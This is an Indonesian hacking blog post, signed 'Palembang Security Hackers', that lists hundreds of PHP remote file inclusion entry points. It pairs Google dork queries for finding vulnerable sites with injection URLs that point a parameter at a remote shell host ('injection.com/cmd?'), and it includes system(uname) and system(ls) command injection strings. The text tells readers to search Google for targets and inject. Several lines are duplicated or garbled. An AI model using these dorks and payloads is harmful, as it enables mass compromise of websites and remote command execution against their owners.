28/06/10

...::Bug::...

pm/lib.inc.php?sfx= pm
pm/lib.inc.php?pm_path= pm
artmedic-kleinanzeigen-path/index.php?id= artmedic
osticket/include/main.php?include_dir= osticket
include/main.php?config[search_disp]=include_dir= include
phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]= phpcoin
quick_reply.php?phpbb_root_pat h= quick_reply.php?phpbb_root_pat h=
zboard/include/write.php?dir= zboard
PATH/admin/plog-admin-functions.php?configbasedir= PATH
path_to_phpgreetz/content.php?content= path_to_phpgreetz
path_to_qnews/q-news.php?id= qnews
_conf/core/common-tpl-vars.php?confdir= core
votebox.php?VoteBoxPath= votebox.php?VoteBoxPath=
al_initialize.php?alpath= al_initialize.php?alpath=
include/db.php?GLOBALS[rootdp]= include
modules/news/archivednews.php?GLOBALS[language_home]= news
protection.php?siteurl= protection.php?siteurl=
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= AllMyGuests
classes.php?LOCAL_PATH= classes.php?LOCAL_PATH=
extensions/moblog/moblog_lib.php?basedir= moblog
modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= newbb_plus
phpWebLog/include/init.inc.php?G_PATH= phpWebLog
admin/objects.inc.php4?Server= admin
trg_news30/trgnews/install/article.php?dir= trgnews
block.php?Include=
block.php?Include= block.php?Include=
path_to_gallery/setup/index.php?GALLERY_BASEDIR= gallery
include/help.php?base= include
path_to_script/block.php?Include= block.php?Include=
examples/phonebook.php?page= phonebook.php?page=
examples/phonebook.php?page= examples
PHPNews/auth.php?path= PHPNews
include/print_category.php?dir= print_category.php?dir=
skin/zero_vote/login.php?dir= zero_vote
skin/zero_vote/setup.php?dir= zero_vote
skin/zero_vote/ask_password.php?dir= zero_vote
gui/include/sql.php?include_path= gui
webmail/lib/emailreader_execute_on_each_pa ge.inc.php?emailreader_ini= webmail
email.php?login=cer_skin= email.php?login=cer_skin=
PhotoGal/ops/gals.php?news_file= PhotoGal
oneadmin/config.php?path[docroot]= oneadmin
skin/zero_vote/setup.php?dir= skin
xcomic/initialize.php?xcomicRootPath= xcomic
skin/zero_vote/error.php? dir= skin
admin_modules/admin_module_captions.inc.php? config[path_src_include]= admin_modules
admin_modules/admin_module_rotimage.inc.php? config[path_src_include]= admin_modules
admin_modules/admin_module_delcomments.inc.p hp?config[path_src_include]= admin_modules
admin_modules/admin_module_delimage.inc.php? config[path_src_include]= admin_modules
admin_modules/admin_module_deldir.inc.php?co nfig[path_src_include]= admin_modules
src/index_overview.inc.php?config[path_src_include]= src
src/index_leftnavbar.inc.php?confi g[path_src_include]= src
src/image-gd.class.php?config[path_src_include]= src
src/image.class.php?config[path_src_include]= src
src/album.class.php?config[path_src_include]= src
src/show_random.inc.php?config[path_src_include]= src
yappa-ng/src/index_overview.inc.php?config[path_src_include]= yappa
phpgedview/help_text_vars.php?PGV_BASE_DI RECTORY= phpgedview
dotproject/modules/files/index_table.php?root_dir= dotproject
CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]= CubeCart
inc/formmail.inc.php?script_root= formmail.inc.php?script_root=
e107/e107_handlers/secure_img_render.php?p= e107
path_of_cpcommerce/_functions.php?prefix= cpcommerce
p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM= uppc
yabbse/Sources/Packages.php?sourcedir= yabbse
gadgets/Blog/BlogModel.php?path=
gadgets/Blog/BlogModel.php?path= gadgets
learnlinc/clmcpreload.php?CLPATH= learnlinc
modernbill/samples/news.php?DIR= modernbill
family/phpgedview/index.php?PGV_BASE_DIRECTORY= phpgedview
nucleus/libs/globalfunctions.php?DIR_LIBS= nucleus
Popper/index.php?childwindow.inc.php? form= Popper
becommunity/community/index.php?pageurl= becommunity
catalog/includes/include_once.php?include_file= catalog
zb41/include/write.php?dir= zb41
phpprojekt/lib/authform.inc.php?path_pre= phpprojekt
achievo/atk/javascript/class.atkdateattribute.js.php? config_atkroot= achieve
globals.php3?LangCookie=.examp le.com
/main.php?sayfa= inurl:main.php?sayfa=
/zipndownload.php?PP_PATH= Powered by: PhotoPost PHP 4.6
skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer CMS
/components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:com_facileforms site:.ar
main.php?open=
main.php?open=
/surveys/survey.inc.php?path= inurl:surveys
components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?
mosConfig_absolute_p ath= com_mtree
index_principal.php?pagina= index_principal.php?pagina=
template.php?name= template.php?name=
main.php?link= main.php?link=
index.php?open= index.php?open=
index.php?visualizar= index.php?visualizar=
index.php?screen= index.php?screen=
index.php?Load= index.php?Load=
index.php?Language= index.php?Language=
index2.php?DoAction= index2.php?DoAction=
index0.php?show= index0.php?show=
index2.php?x= index2.php?x=
al_initialize.php?alpath= Powered by AutoLinks Pro
components/com_performs/performs.php?mosConfig_absolute_path= com_performs
1. allinurl:my_egallery site:.org
my_egallery: /modules/My_eGallery/public/displayCategory.php?
basepath=http://www.injection.com/cmd?
2. allinurl:xgallery site:.org
xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. allinurl:coppermine site:.org
coppermine: /modules/coppermine/themes/default/theme.php?
THEME_DIR=http://www.injection.com/cmd?
4. allinurl:4nAlbum site:.org
4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath=
5. allinurl:PNphpBB2 site:.org
6. allinurl:/modules.php?name=allmyguests
AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
7. allinurl:/Popper/index.php?
/Popper/index.php? : /Popper/index.php?childwindow.inc.php?form=
8. allinurl:kietu/hit_js.php
kietu/index.php?kietu[url_hit]=http://www.injection.com/cmd?
9. keyword : "Powered by phpBB 2.0.6"
&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.injection.com/cmd?
10. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
11. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=http://www.injection.com/cmd?
12. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.injection.com/cmd?
13. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.injection.com/cmd?

15. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
allinurl:ihm.php?p=http://www.injection.com/cmd?
16. allinurl:modules.php?name=Forums
/modules.php?name=http://www.injection.com/cmd?
17. allinurl:.php?bodyfile=
18. allinurl:/default.php?page=home
19. allinurl:/folder.php?id=
20. allinurl:main.php?pagina=
21. allinurl:AshNews atau allinurl: /ashnews.php
22. allinurl:ihm.php?p=*
23. inurl:option=frontpage
/index.php?option=frontpage&Itemid=system(uname) index.php?option=
frontpage&Itemid=system(ls)
24. allinurl:shoutbox/expanded.php filetype:php
/shoutbox/expanded.php?conf=
25. inurl:option=frontpage
index.php?option=frontpage&Itemid=system(uname) index.php?option=
frontpage&Itemid=system(ls)
26. allinurl:shoutbox/expanded.php filetype:php
/shoutbox/expanded.php?conf=
Nah berikut ini salah satu bisa kamu coba juga untuk menginject:
=====================================================================
http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=
http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=
http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
http://www.target.com/src/index_overview.inc.php?config[path_src_include]=
http://www.target.com/src/image-gd.class.php?config[path_src_include]=
http://www.target.com/src/album.class.php?config[path_src_include]=
http://www.target.com/src/show_random.inc.php?config[path_src_include]=
http://www.target.com/src/main.inc.php?config[path_src_include]=
http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=
Target :
========
Temukan target nya di google dengan keyword:
1.allinurl:*.php?page=*
2.allinurl:*.php?content=*
3.allinurl:*.php?file=*
4.allinurl:*.php?filename=*
5.allinurl:*.php?link=*
6.allinurl:*.php?view=*
7.allinurl:*.php?sec=*
8.allinurl:*.php?document=*
9.allinurl:*.php?p=*
10.allinurl:*.php?x=*
Exploit:
=========
1.http://www.target.com/target.php?page=Injekan
2.http://www.target.com/target.php?content=injekan
3.http://www.target.com/target.php?file=
4.http://www.target.com/target.php?filename=
5.http://www.target.com/target.php?link=
6.http://www.target.com/target.php?view=
7.http://www.target.com/target.php?sec=
8.http://www.target.com/target.php?documet=
9.http://www.target.com/target.php?p=
10.http://www.target.com/target.php?x=
Palembang Security Hackers
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/include/new-visitor.inc.php?lvc_include_dir=
/path_of_cpcommerce/_functions.php?prefix
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/main.php?x=
/index.php/main.php?x=
/index.php?include=
/index.php?x=
/index.php?open=
/index.php?visualizar=
/template.php?pagina=
/index.php?pagina=
/index.php?inc=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/include/new-visitor.inc.php?lvc_include_dir=
/path_of_cpcommerce/_functions.php?prefix
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/main.php?x=
/index.php/main.php?x=
/index.php?open=
/index.php?visualizar=
/template.php?pagina=
/index.php?pagina=
/index.php?inc=
Mais Strings
index.php?leng=
index.php?page=
index.php?rev=
index.php?main=
index.php?show=
index.php?x=
index.php?inc=
index.php?menu=
index.php?aktie=
index.php?s=
index.php?p=
index.php?principal=
index.php?url=
index.php?file=
index.php?do=
index.php?side=
index.php?f=
index.php?display=
index.php?webpage=
index.php?content=
index.php?source=
index.php?texto=
index.php?go=
index.php?contents=
index.php?meio=
index.php?miolo=
index.php?section=
index.php?configFile=
index.php?op=
index.php?id=
index.php?corpo=
index.php?article=
index.php?Itemid=
index.php?product_id=
index.php?lang=
index.php?showtopic=
index.php?option=
index.php?link=
index.php?module=
index.php?submenu=
index.php?cat=
index.php?visualizar=
index.php?open=
index.php?include=
/phplinks/index.php?show=
blank.php?path=
site.php?content=
impresion.php?f1=
topicos.php?area=
/shoutbox/expanded.php?conf=

becommunity/community/index.php?pageurl=
/bb_lib/checkdb.inc.php?libpllery/public/displayCategory.php?basepath=
becommunity/community/index.php?pageurl=
/bb_lib/checkdb.inc.php?libpach=
livre_include.php?no_connect=lol&chem_absolu=
cutenews/inc/shows.inc.php?cutepath=
admin/common.inc.php?base_path=
sources/login.php?fil_config=
moosegallery/display.php?type=
pictures.php?x=
base.php?menu=
main.php?page=
main.php?file=
main.php?ver=
main.php?dir=
main.php?side=
main.php?doc=
main.php?x=
main.php?lk=
main.php?pbody=
main.php?menu=
main.php?op=
mainfile.php?MAIN_PATH=
padrao.php?conteudo=
pages.php?content=
page.php?page=
print.php?pagename=
home.php?x=
disb.php?lugar=
index2.php?secao=
index2.php?center=
index2.php?content=
index2.php?area=
index2.php?link=
index2.php?id=
strings em sites?
index2.php?fight=
index2.php?id=
index2.php?music=
index2.php?record=
index2.php?p=
index2.php?home=
index2.php?site=
index2.php?radio=
site.php?Tipo=
site.php?nav=
site.php?comsocial=
site.php?pagina=
site.php?opcao= site.php?menu=
site.php?area=
template.php?pagina=
modules.php?name=
index1.php?link=
index1.php?center=
index1.php?inside=

0 komentar:

Poskan Komentar

Mini Fordis b3gund4L